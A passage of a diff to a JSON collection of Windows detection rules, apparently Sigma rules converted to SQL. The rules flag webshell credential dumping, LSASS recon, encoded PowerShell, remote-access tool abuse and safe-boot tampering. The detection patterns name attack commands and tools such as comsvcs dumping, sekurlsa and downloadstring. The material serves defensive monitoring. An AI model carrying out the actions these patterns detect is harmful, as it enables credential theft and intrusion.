EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", - "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "status": "experimental", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Sysprep on AppData Folder", - "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "status": "test", - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysprep_appdata.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "Custom Class Execution via Xwizard", + "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" }, { - "title": "Service Security Descriptor Tampering Via Sc.EXE", - "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", "status": "experimental", - "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_modification.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Execution Of PDQDeployRunner", - "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", - "status": "experimental", - "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "status": "test", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the PDQDeploy tool to execute these commands" + "Legitimate deployment of AnyDesk" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Use of Adplus.exe", - "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ - "Legitimate usage of Adplus" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_adplus.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "Execution in Webserver Root Folder", - "id": "35efb964-e6a5-47ad-bbcd-19661854018d", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Various applications", - "Tools that include ping or nslookup command invocations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", - "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.t1055" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "status": "experimental", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", + "status": "test", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1053.005" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", - "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.g0069" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE 